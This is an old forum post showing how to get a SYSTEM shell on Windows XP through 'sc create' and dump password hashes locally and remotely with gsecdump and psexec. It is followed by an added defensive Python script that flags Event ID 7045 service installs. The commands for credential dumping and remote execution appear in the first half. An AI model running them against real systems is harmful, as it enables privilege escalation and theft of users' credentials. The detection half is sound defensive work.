Title: HASH injection attack
Author: admin  Time: 2012-11-6 21:09

To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ]             show help
-a [ --dump_all ]         dump all secrets
-l [ --dump_lsa ]         dump lsa secrets
-w [ --dump_wireless ]    dump microsoft wireless connections
-u [ --dump_usedhashes ]  dump hashes from active logon sessions
-s [ --dump_hashes ]      dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
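From the defender's side, both steps in the post leave a trace in the Windows System log: the Service Control Manager records every newly installed service as Event ID 7045, including its image path and the account it runs as, so a cmd.exe registered as a service and the PSEXESVC service that PsExec installs on the target both show up there. The Python below is an added example, not part of the original post; it triages constructed 7045 records in a flattened key/value layout that is itself an assumption about how a log export might look.

```python
import re

# Constructed sample Event ID 7045 records (Service Control Manager,
# "A service was installed in the system"), flattened to one line each.
# These are made-up examples for the demo, not real telemetry.
SAMPLE_7045 = [
    "Service Name: shellcmdline | Service File Name: C:\\WINDOWS\\system32\\cmd.exe /K start"
    " | Service Type: user mode service | Service Account: LocalSystem",
    "Service Name: PSEXESVC | Service File Name: %SystemRoot%\\PSEXESVC.exe"
    " | Service Type: user mode service | Service Account: LocalSystem",
    "Service Name: Spooler | Service File Name: C:\\WINDOWS\\system32\\spoolsv.exe"
    " | Service Type: user mode service | Service Account: LocalSystem",
    "Service Name: UpdateHelper | Service File Name: C:\\Program Files\\Vendor\\updater.exe"
    " | Service Type: user mode service | Service Account: NT AUTHORITY\\LocalService",
]

# Image names that should never be the binary of a Windows service.
SHELL_BINARIES = ("cmd.exe", "powershell.exe")

# Assumed field layout: "Key: value" pairs separated by " | ".
FIELD_RE = re.compile(r"(Service Name|Service File Name|Service Type|Service Account): ([^|]+)")


def parse_event(line):
    """Turn one flattened 7045 record into a dict of its fields."""
    return {key.strip(): value.strip() for key, value in FIELD_RE.findall(line)}


def classify(event):
    """Return the reasons a 7045 record deserves analyst review (empty list = benign)."""
    reasons = []
    image = event.get("Service File Name", "").lower()
    if any(shell in image for shell in SHELL_BINARIES):
        # Matches the post's sc create trick: an interactive shell running as a service.
        reasons.append("service image is an interactive shell")
    if event.get("Service Name", "").upper() == "PSEXESVC":
        # PsExec copies and registers this service on the remote host before running.
        reasons.append("PsExec service installation")
    return reasons


def triage(lines):
    """Return (service name, reasons) for every record that is worth a look."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits.append((event.get("Service Name", "?"), reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_7045):
        print(f"{name}: {'; '.join(reasons)}")
```

In a real deployment the two rules would run over 7045 events collected centrally, and the LocalSystem account on a shell image is the combination that corresponds to the SYSTEM prompt shown in the post.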